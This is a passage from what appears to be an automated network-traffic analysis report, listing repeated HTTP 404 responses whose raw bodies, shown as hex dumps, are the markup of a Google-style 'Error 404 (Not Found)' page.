3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:27:54 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:27:57 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:28:00 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:28:03 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:28:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:28:09 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:28:12 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 